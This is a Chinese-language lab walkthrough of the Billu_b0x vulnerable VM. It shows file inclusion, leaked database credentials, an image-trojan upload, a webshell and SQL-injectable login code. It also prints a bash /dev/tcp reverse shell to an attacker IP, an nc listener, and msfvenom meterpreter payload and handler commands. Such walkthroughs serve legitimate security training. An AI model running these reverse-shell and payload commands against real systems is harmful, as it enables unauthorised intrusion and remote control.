靶机练习(Billu_b0x)

靶机:192.168.116.132

查看局域网内存活主机

靶机练习(Billu_b0x)_第1张图片

查看开放的服务

靶机练习(Billu_b0x)_第2张图片

访问Web页面

靶机练习(Billu_b0x)_第3张图片

目录爆破

靶机练习(Billu_b0x)_第4张图片

 

访问这几个文件

靶机练习(Billu_b0x)_第5张图片

http://192.168.116.133/in.php

提示参数为空,我们添加参数看看

靶机练习(Billu_b0x)_第6张图片

Get请求没有回显,Post请求有效

靶机练习(Billu_b0x)_第7张图片

证明可以文件包含

靶机练习(Billu_b0x)_第8张图片

mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");

靶机练习(Billu_b0x)_第9张图片

使用账户密码登陆

靶机练习(Billu_b0x)_第10张图片

靶机练习(Billu_b0x)_第11张图片

读取源码,发现有文件上传漏洞

靶机练习(Billu_b0x)_第12张图片

靶机练习(Billu_b0x)_第13张图片

图片马地址: http://192.168.116.133/uploaded_images/cmd.jpg

靶机练习(Billu_b0x)_第14张图片

靶机练习(Billu_b0x)_第15张图片

靶机练习(Billu_b0x)_第16张图片

写入一句话木马

靶机练习(Billu_b0x)_第17张图片

echo '' >> uploaded_images/shell.php

靶机练习(Billu_b0x)_第18张图片

查看linux系统信息

靶机练习(Billu_b0x)_第19张图片

echo "bash -i >& /dev/tcp/192.168.116.131/4444 0>&1" | bash (进行一次url编码)

nc -lvvp 4444

靶机练习(Billu_b0x)_第20张图片

制作反弹shell

root@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.116.131 lport=4444 -f raw > she.php

root@kali:~# msfvenom

msf5 payload(php/meterpreter/reverse_tcp) > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp

payload => php/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set lhost 192.68.116.131

lhost => 192.68.116.131

msf5 exploit(multi/handler) > set lport 4444

lport => 4444

msf5 exploit(multi/handler) > exploit

靶机练习(Billu_b0x)_第21张图片

使用文件包含读取phpmyadmin配置文件

靶机练习(Billu_b0x)_第22张图片

可采用ssh连接

靶机练习(Billu_b0x)_第23张图片

包含index.php文件进行代码审计

靶机练习(Billu_b0x)_第24张图片

$uname=str_replace('\'','',urldecode($_POST['un']));

$pass=str_replace('\'','',urldecode($_POST['ps']));

$run='select * from auth where pass=\''.$pass.'\' and uname=\''.$uname.'\'';

$result = mysqli_query($conn, $run);

你可能感兴趣的:(靶机练习(Billu_b0x))